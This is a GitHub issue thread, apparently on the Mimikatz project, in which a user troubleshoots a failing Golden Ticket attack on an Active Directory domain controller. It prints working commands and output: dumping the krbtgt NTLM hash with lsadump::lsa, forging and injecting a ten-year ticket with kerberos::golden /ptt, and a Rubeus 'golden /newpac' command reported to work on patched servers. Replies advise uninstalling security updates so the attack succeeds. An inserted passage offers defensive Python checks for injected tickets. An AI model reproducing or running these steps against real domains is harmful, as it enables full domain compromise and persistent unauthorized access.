
ISSUE: Losing tickets when attempting to use the Mimikatz golden module #416

Open
rick-engle opened this issue Jan 12, 2023 · 8 comments

@rick-engle

I have been going through many of your wikis and various articles on Mimikatz and cannot understand why I can't get the Golden Ticket attack to work. I am injecting a golden ticket into my session, but as soon as I try an elevated privilege command like dir \\servername\c$, running klist shows me that my ticket is no longer cached.

I am running Mimikatz on a non-domain joined Windows 10 PC that is on the same network as an unpatched Windows Server 2012 R2 Domain Controller.

I have the SID of my domain controller (sid:S-1-5-21…) the full domain name, and the hash for my krbtgt account. I got the NTLM HASH for the krbtgt account like this:

mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : MYDOMAIN / S-1-5-21-4053458607-1441617025-XXXXXXXXXX

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 09a4891da94d1f2522afdc7c4dd09b7b
    LM   :
  Hash NTLM: 09a4891da94d1f2522afdc7c4dd09b7b
    ntlm- 0: 09a4891da94d1f2522afdc7c4dd09b7b
    lm  - 0: 59968800dc52757ec5fe14f86b2103cd

Then I run this command in Mimikatz which is successful:
kerberos::golden /user:baduser1 /domain:mydomain.com /sid:S-1-5-21-4053458607-1441617025-XXXXXXXXXX /krbtgt:09a4891da94d1f2522afdc7c4dd09b7b /ptt

mimikatz # kerberos::golden /user:baduser1 /domain:toondom2.com /sid:S-1-5-21-4053458607-1441617025-3390084498 /krbtgt:09a4891da94d1f2522afdc7c4dd09b7b /ptt

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com/ / https://mysmartlogon.com/ ***/

User : baduser1
Domain : mydomain.com (MYDOMAIN)
SID : S-1-5-21-4053458607-1441617025- XXXXXXXXXX
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 09a4891da94d1f2522afdc7c4dd09b7b - rc4_hmac_nt
Lifetime : 12/19/2022 5:59:20 PM ; 12/16/2032 5:59:20 PM ; 12/16/2032 5:59:20 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'baduser1 @ mydomain.com' successfully submitted for current session

I then exit Mimikatz, and check my ticket with klist and I see my ticket:
Current LogonId is 0:0xab242d

Cached Tickets: (1)

#0> Client: baduser1 @ toondom2.com
Server: krbtgt/mydomain.com @ mydomain.com
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 12/19/2022 17:59:20 (local)
End Time: 12/16/2032 17:59:20 (local)
Renew Time: 12/16/2032 17:59:20 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

But then as soon as I try to access my domain controller using something like this:
C:\Attackfolder\x64>dir \\DC1.mydomain.com\c$
The username or password is incorrect.

And then running klist again:
Current LogonId is 0:0xab242d
Cached Tickets: (0)

I have tried so many different options in Mimikatz and while all of the articles seem to make it look very simple, my ticket is always removed/revoked, and I don’t succeed in the attack.

Do you see what I’m doing wrong and have a suggestion?
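Two defender-side checks built from the artifacts this thread shows, as an added example (not code from the issue or from Mimikatz): on the client, a cached TGT whose "Kdc Called:" field is empty (as in the klist output above) was injected rather than issued by a KDC; on the domain controller, a 4769 service-ticket request from a client that never produced a 4768 means no KDC issued the TGT it presented. The klist text and the event records are constructed, and the event field names are simplified.

```python
import re

# Constructed klist output (not the issue's own) in the thread's layout. A TGT from
# a KDC records which DC issued it; an injected TGT leaves "Kdc Called:" empty.
KLIST_SAMPLE = """Current LogonId is 0:0xab242d

Cached Tickets: (2)

#0> Client: baduser1 @ mydomain.com
Server: krbtgt/mydomain.com @ mydomain.com
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

#1> Client: alice @ mydomain.com
Server: krbtgt/mydomain.com @ mydomain.com
Cache Flags: 0x1 -> PRIMARY
Kdc Called: DC1.mydomain.com
"""

def injected_tgts(klist_text):
    """Return clients whose cached krbtgt TGT names no issuing KDC."""
    hits = []
    for block in re.split(r"\n(?=#\d+>)", klist_text):
        client = re.search(r"Client:\s*(\S+)", block)
        server = re.search(r"Server:\s*(\S+)", block)
        kdc = re.search(r"Kdc Called:[ \t]*(\S*)", block)
        if client and server and kdc and server.group(1).startswith("krbtgt/") and not kdc.group(1):
            hits.append(client.group(1))
    return hits

# Constructed DC Security-log records (fields trimmed): 4768 = TGT issued by a
# KDC, 4769 = service ticket requested with a TGT. "status" is the Kerberos
# result code; anything but 0x0 means the KDC refused the request. Records are
# assumed to be merged from every DC and sorted by time.
DC_EVENTS = [
    {"id": 4768, "user": "alice", "ip": "10.0.0.15", "status": "0x0"},
    {"id": 4769, "user": "alice", "ip": "10.0.0.15", "service": "cifs/DC1", "status": "0x0"},
    {"id": 4769, "user": "baduser1", "ip": "10.0.0.99", "service": "cifs/DC1", "status": "0x1f"},
]

def tgs_without_as(events):
    """Flag 4769s whose (user, ip) never got a 4768: no KDC issued that TGT."""
    issued, alerts = set(), []
    for ev in events:
        key = (ev["user"].lower(), ev["ip"])
        if ev["id"] == 4768 and ev["status"] == "0x0":
            issued.add(key)
        elif ev["id"] == 4769 and key not in issued:
            alerts.append((ev["user"], ev["ip"], ev["service"], ev["status"]))
    return alerts
```

The second check only works on logs collected from every DC in the domain, since the 4768 and the later 4769 may land on different KDCs.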

@Lucifer1993

Lucifer1993 commented Jan 12, 2023 via email

@rick-engle (Author)

@Lucifer1993, I have no idea what you meant by that reply, can you explain?

@rick-engle (Author)

Hello @SergANT85. I don't have update KB5020805 installed; my latest update is KB5021294. Are there any event log entries that show that the Kerberos golden ticket is revoked? It sounds like it is related to RC4.
Before you fixed the issue, did you also see the scenario where you get a ticket using Mimikatz and then, as soon as you try to access the domain controller (e.g. dir \\MYDC1.com\c$), the ticket is lost? I see it first using klist, but as soon as I try to access the DC, the ticket is lost.

@rick-engle (Author)

I've been looking into this, and it looks like Mimikatz can't currently overcome this issue. I found that Rubeus works as an alternative solution using this command from a domain-joined PC:
Rubeus golden /newpac /rc4:krbtgtNTLMhash /ldap /user:nondomainadminuser /groups:512 /endtime:10y /ptt
My understanding is that Mimikatz does not support the equivalent of the Rubeus /newpac command.
The Rubeus solution also works on a patched domain controller, I was using Windows Server 2012 R2 but it also works on Windows Server 2019.

@SergANT85

@rick-engle

Hello!

KB5020805 is in cumulative updates.
You can try to uninstall the updates released after November 2022, and the Mimikatz golden ticket will work correctly (ok).

@t3hbb

t3hbb commented Aug 15, 2023

@rick-engle

This blog post covers a similar issue; it might possibly help: https://www.cybaverse.co.uk/resources/the-curious-case-of-the-kerberos-realm

@rick-engle (Author)

Thank you @t3hbb. I will look at that blog article. In the meantime, my workaround was to switch to using Rubeus.exe, as it is working for this scenario with the current security updates that are installed on my domain controller.
